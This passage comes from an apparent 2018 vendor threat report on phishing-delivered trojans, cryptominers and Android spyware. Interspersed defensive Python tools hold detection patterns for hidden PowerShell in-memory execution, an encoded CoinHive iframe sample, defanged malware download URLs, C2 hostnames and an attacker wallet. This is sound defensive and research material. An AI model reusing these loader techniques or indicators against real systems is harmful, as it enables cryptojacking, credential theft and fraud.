TrojWare.JS.Faceliker just clicks posts on Facebook on behalf of the user to promote fake or fraudulent pages. The malware infects users' browsers when they visit malicious or compromised websites. Then, when infected users open Facebook, Faceliker hijacks their "likes".
TrojWare.Win32.Kryptik steals information from computers and sends it to the cybercriminals' Command-and-Control server.
TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It is usually spread via a phishing email.
Such diversity of malicious activity and their special ability to hide have always made trojans among the hardest malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today, phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.
The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to AppData as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option used to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning, because it infects computers with popular legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief's tool.
Ammyy Admin is remote desktop software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software, Microsoft's this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
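A defender's first check on an IQY attachment is simply where it points and whether it posts data when opened. The Python below is an added example, not code from the Comodo report: it parses the plain-text IQY layout (a WEB header, a version line, the URL, an optional POST line, then Key=Value options) and flags the properties that made these lures dangerous; the allowlist host and both sample files are constructed.

```python
"""Triage an Excel Internet Query (.iqy) attachment before anyone opens it.

IQY layout (plain text): line 1 'WEB'; line 2 the format version, normally
'1'; line 3 the URL Excel fetches and renders into the sheet; line 4 POST
parameters (blank for a GET); remaining lines Key=Value options.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Hosts this organisation legitimately queries from Excel. Assumption for the
# example only, not a list from the report.
ALLOWED_HOSTS = {"reports.intranet.example"}


@dataclass
class IqyQuery:
    url: Optional[str] = None
    post_params: Optional[str] = None
    options: Dict[str, str] = field(default_factory=dict)
    findings: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_iqy(text: str) -> IqyQuery:
    """Split an .iqy body into URL, POST data and options (CRLF or LF)."""
    lines = text.replace("\r\n", "\n").split("\n")
    query = IqyQuery()
    if lines[0].strip().upper() != "WEB":
        query.findings.append("not a WEB query: unexpected first line")
        return query
    if len(lines) > 2:
        query.url = lines[2].strip() or None
    if len(lines) > 3:
        query.post_params = lines[3].strip() or None
    for line in lines[4:]:
        key, sep, value = line.partition("=")
        if sep:
            query.options[key.strip()] = value.strip()
    return query


def triage_iqy(text: str) -> IqyQuery:
    """Parse the file and record every reason it should be held back."""
    query = parse_iqy(text)
    if query.findings:
        return query
    if query.url is None:
        query.findings.append("no URL on line 3")
        return query
    parsed = urlparse(query.url)
    host = (parsed.hostname or "").lower()
    if parsed.scheme not in ("http", "https") or not host:
        query.findings.append(f"unusual scheme or host: {query.url}")
    elif host not in ALLOWED_HOSTS:
        # The property the Flawed Ammyy lures relied on: Excel pulling
        # content from an arbitrary external server the moment the file opens.
        query.findings.append(f"URL points outside the allowlist: {host}")
    if parsed.scheme == "http":
        query.findings.append("cleartext http fetch")
    if query.post_params:
        query.findings.append("sends POST data when opened")
    return query


# Constructed samples; the lure hostname is a placeholder, not an indicator
# from the report.
LURE_IQY = ("WEB\r\n1\r\nhttp://lure.example/1.dat\r\n\r\n"
            "Selection=AllTables\r\nFormatting=None\r\n")
INTERNAL_IQY = "WEB\n1\nhttps://reports.intranet.example/sales.aspx\n\nSelection=1\n"

if __name__ == "__main__":
    for name, body in (("lure", LURE_IQY), ("internal", INTERNAL_IQY)):
        result = triage_iqy(body)
        print(name, "BLOCK" if result.suspicious else "allow", result.url, result.findings)
```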
Malware runs PowerShell
Thus in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulating users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
[Chart: The growth of Flawed Ammyy attacks for Q2. Apr: 43188, May: 46382, Jun: 48881]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean that their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware is malicious code injected into legitimate OS processes. It need not be installed on a victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects a user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
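Decoding the PowerShell arguments is the step that exposed BadShell. The Python below is an added example and not the investigation's own tooling: it decodes a captured command line (the -EncodedCommand value is base64 of UTF-16LE text) and flags the traits the report describes, a hidden window, a payload read from the registry and in-memory execution. The registry path, the task command lines and the indicator patterns are constructed for illustration.

```python
"""Decode PowerShell -EncodedCommand arguments and surface BadShell-style traits:
PowerShell started with a hidden window, a payload read from the registry and
executed in memory. Added example; patterns and samples are illustrative.
"""
import base64
import re
from typing import Dict, List, Optional

# powershell.exe accepts -EncodedCommand and its abbreviations -e, -ec, -enc.
ENCODED_FLAG = re.compile(r"^-(?:e|ec|enc|encodedcommand)$", re.IGNORECASE)

# Traits worth surfacing in the command line or the decoded script.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "registry_read": re.compile(r"Get-ItemProperty|HK(?:CU|LM):\\", re.IGNORECASE),
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "in_memory_exec": re.compile(
        r"Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load", re.IGNORECASE),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    tokens = cmdline.split()
    for index, token in enumerate(tokens[:-1]):
        if ENCODED_FLAG.match(token):
            try:
                raw = base64.b64decode(tokens[index + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def analyse_command_line(cmdline: str) -> Dict[str, object]:
    """Decode the command and report which traits it shows."""
    script = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (script or "")
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    # Registry as the payload store plus in-memory execution is the BadShell shape.
    suspicious = "registry_read" in hits and "in_memory_exec" in hits
    return {"decoded": script, "indicators": hits, "suspicious": suspicious}


def encode_for_demo(script: str) -> str:
    """Produce the base64 form PowerShell expects; used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples. The registry path and file paths are placeholders.
BADSHELL_LIKE_SCRIPT = (
    "$p = (Get-ItemProperty -Path 'HKCU:\\Software\\Classes\\demo').payload; "
    "IEX ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($p)))"
)
BADSHELL_LIKE_TASK = ("powershell.exe -NoP -W Hidden -EncodedCommand "
                      + encode_for_demo(BADSHELL_LIKE_SCRIPT))
ADMIN_TASK = ("powershell.exe -EncodedCommand "
              + encode_for_demo("Get-Date | Out-File C:\\Temp\\heartbeat.txt"))

if __name__ == "__main__":
    for label, cmd in (("task", BADSHELL_LIKE_TASK), ("admin", ADMIN_TASK)):
        print(label, analyse_command_line(cmd)["indicators"])
```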
BadShell at work
The malicious code in the registry
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the financial losses of the company were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to the cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system totally.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner occupies the victim's computer undivided, to use its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, making them easier for users to detect. In Q2 these cryptominers learned to hide. CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
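Checking a page for this camouflage means decoding the embedded string before looking for the iframe. The Python below is an added example (not code from the report or from CoinHive): it collects iframes and scripts from a page, decodes unescape()/decodeURIComponent()/atob() arguments found in scripts and scans the decoded HTML again, flagging 1x1 iframes to cnhv.co and direct loads of the CoinHive script. The pages are constructed; the cnhv.co path and the site key are placeholders.

```python
"""Find CoinHive loaders on a page, including the camouflaged 1x1 iframe to a
cnhv.co short link that the report describes (added example, not report code)."""
import base64
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import unquote, urlparse

MINER_HOSTS = {"coinhive.com", "cnhv.co"}  # CoinHive and its short-link service
MINER_API = re.compile(r"CoinHive\.(?:Anonymous|User)|coinhive\.min\.js", re.IGNORECASE)
# Decoding calls whose string argument may hide more HTML.
ENCODED_ARG = re.compile(r"\b(unescape|decodeURIComponent|atob)\(\s*['\"]([^'\"]+)['\"]\s*\)")


class _Collector(HTMLParser):
    """Collect iframe attributes and script sources/bodies from one fragment."""
    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []
        self.scripts: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attributes = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(attributes)
        elif tag == "script":
            self._in_script = True
            if attributes.get("src"):
                self.scripts.append("src:" + attributes["src"])

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _host(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def _is_hidden(attrs: Dict[str, str]) -> bool:
    """1x1 (or smaller) dimensions or CSS hiding: the trick shown above."""
    sizes = [re.match(r"\s*(\d+)", attrs.get(k, "")) for k in ("width", "height")]
    tiny = any(m and int(m.group(1)) <= 1 for m in sizes)
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def _decode_strings(script: str) -> List[str]:
    """Decode unescape()/decodeURIComponent()/atob() arguments in a script."""
    decoded = []
    for func, arg in ENCODED_ARG.findall(script):
        if func != "atob":
            decoded.append(unquote(arg))
            continue
        try:
            decoded.append(base64.b64decode(arg + "=" * (-len(arg) % 4)).decode("utf-8", "replace"))
        except ValueError:
            continue
    return decoded


def scan_page(html: str, depth: int = 3) -> List[Dict[str, str]]:
    """Report miner iframes, loaders and API calls, recursing into decoded strings."""
    findings: List[Dict[str, str]] = []
    collector = _Collector()
    collector.feed(html)
    for frame in collector.iframes:
        host = _host(frame.get("src", ""))
        if host in MINER_HOSTS:
            findings.append({"kind": "hidden_iframe" if _is_hidden(frame) else "visible_iframe", "host": host})
    for script in collector.scripts:
        if script.startswith("src:"):
            host = _host(script[4:])
            if host in MINER_HOSTS:
                findings.append({"kind": "miner_script", "host": host})
            continue
        if MINER_API.search(script):
            findings.append({"kind": "miner_api_call", "host": ""})
        if depth > 0:  # the camouflage: HTML hidden inside an encoded string
            for fragment in _decode_strings(script):
                findings.extend(scan_page(fragment, depth - 1))
    return findings


# Constructed pages; the cnhv.co path and the site key are placeholders.
CAMOUFLAGED_PAGE = (
    "<html><body><p>Latest news</p><script>document.write(unescape("
    "'%3Ciframe%20src%3D%22https%3A%2F%2Fcnhv.co%2Fexample%22%20width%3D%221%22"
    "%20height%3D%221%22%3E%3C%2Fiframe%3E'))</script></body></html>"
)
PLAIN_PAGE = (
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    "<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>"
)
CLEAN_PAGE = '<iframe src="https://www.example.org/embed" width="560" height="315"></iframe>'
```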
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string composed of different characters and numbers, so it is almost impossible to remember or fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
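The swap above happens between copy and paste, so a host-side monitor can catch it by watching the clipboard rather than the wallet. This Python is an added example, not code from the report: it classifies clipboard contents by address shape and raises an alert when one address is replaced by a different address of the same kind almost immediately. The timeline is constructed; the two Bitcoin addresses are the ones quoted above, and the process names are placeholders.

```python
"""Spot a clipboard hijack: a wallet address the user copied is silently replaced
by a different address of the same kind moments later.

Added example. The events are const ructed; on a real host they would come
from a clipboard-change hook (for example AddClipboardFormatListener on Windows)
together with the name of the process that set the clipboard.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence

# Address shapes the hijacker swaps. The regexes classify; they do not
# validate checksums, which a hijacker's replacement address passes anyway.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[a-z0-9]{25,90}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


@dataclass(frozen=True)
class ClipboardEvent:
    seconds: float   # time since monitoring started
    text: str        # new clipboard content
    owner: str       # process that wrote it (constructed here)


def classify_address(text: str) -> Optional[str]:
    """Return the address kind for a clipboard value, or None if it is not one."""
    candidate = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return kind
    return None


def detect_hijacks(events: Sequence[ClipboardEvent], window: float = 2.0) -> List[Dict[str, str]]:
    """Flag same-kind address replacements that happen within `window` seconds.

    A user re-copying a different address takes longer than that; the hijacker
    overwrites the clipboard almost instantly after the user's copy.
    """
    alerts: List[Dict[str, str]] = []
    previous: Optional[ClipboardEvent] = None
    for event in events:
        kind = classify_address(event.text)
        if previous is not None and kind is not None and kind == classify_address(previous.text):
            replaced = previous.text.strip() != event.text.strip()
            quick = event.seconds - previous.seconds <= window
            if replaced and quick:
                alerts.append({
                    "kind": kind,
                    "copied": previous.text.strip(),
                    "pasted": event.text.strip(),
                    "owner": event.owner,
                })
        previous = event
    return alerts


# Constructed timeline. The two Bitcoin addresses are the ones the report
# quotes for this attack; process names are placeholders.
TIMELINE = [
    ClipboardEvent(0.0, "Invoice 1187 - please pay to the address below", "outlook.exe"),
    ClipboardEvent(5.0, "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs", "chrome.exe"),
    ClipboardEvent(5.3, "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm", "allradio_portable.exe"),
    ClipboardEvent(60.0, "meeting notes", "notepad.exe"),
    ClipboardEvent(120.0, "0x" + "ab" * 20, "chrome.exe"),
    ClipboardEvent(131.0, "0x" + "cd" * 20, "chrome.exe"),  # user copies a second address later
]

if __name__ == "__main__":
    for alert in detect_hijacks(TIMELINE):
        print(f"{alert['kind']}: {alert['copied']} -> {alert['pasted']} (set by {alert['owner']})")
```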
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It is distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, id, name, phone numbers and the email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الکویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in the spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
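The KevDroid and Zoo Park write-ups above list the same capability set again and again: contacts, accounts, SMS, call logs, audio, camera, location, and an upload channel. An analyst can triage a decoded APK for exactly that combination before any dynamic analysis. The following is an added example written for this page, not Comodo's code and not derived from either malware family. It parses a decoded AndroidManifest.xml (such as apktool produces); both manifests below are constructed for the demo, and the permission-to-capability mapping and the scoring weights are assumptions chosen for illustration.

```python
"""Static manifest triage for the spyware capability set described in the
Android section. Added example; the manifests and weights are constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Assumed mapping from requested permission to the capability it unlocks.
CAPABILITIES = {
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.GET_ACCOUNTS": "accounts",
    "android.permission.READ_SMS": "sms",
    "android.permission.RECEIVE_SMS": "sms",
    "android.permission.SEND_SMS": "sms",
    "android.permission.READ_CALL_LOG": "call-log",
    "android.permission.RECORD_AUDIO": "audio",
    "android.permission.CAMERA": "camera",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.READ_EXTERNAL_STORAGE": "storage",
    "android.permission.RECEIVE_BOOT_COMPLETED": "persistence",
    "android.permission.INTERNET": "exfil",
}
COLLECTION = {"contacts", "accounts", "sms", "call-log", "audio",
              "camera", "location", "storage"}


def triage_manifest(xml_text):
    """Return capabilities, findings and an assumed risk score for a manifest."""
    root = ET.fromstring(xml_text)
    requested = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    caps = sorted({CAPABILITIES[p] for p in requested if p in CAPABILITIES})
    collected = [c for c in caps if c in COLLECTION]
    # An app with no LAUNCHER activity never shows an icon. KevDroid hides its
    # icon at runtime instead, so treat this only as a weak corroborating signal.
    has_launcher = any(
        cat.get(ANDROID_NS + "name") == "android.intent.category.LAUNCHER"
        for cat in root.iter("category"))
    findings = []
    if "exfil" in caps and len(collected) >= 3:
        findings.append("broad data collection combined with network access")
    if "persistence" in caps:
        findings.append("restarts itself at boot")
    if not has_launcher:
        findings.append("no launcher activity declared")
    score = len(collected) + (2 if "exfil" in caps else 0) + (2 if not has_launcher else 0)
    return {"capabilities": caps, "findings": findings, "score": score}


# Constructed manifests for the demo (not taken from any real APK).
SPY_LIKE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.defender">
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Defender">
    <service android:name=".CollectorService"/>
    <receiver android:name=".BootReceiver">
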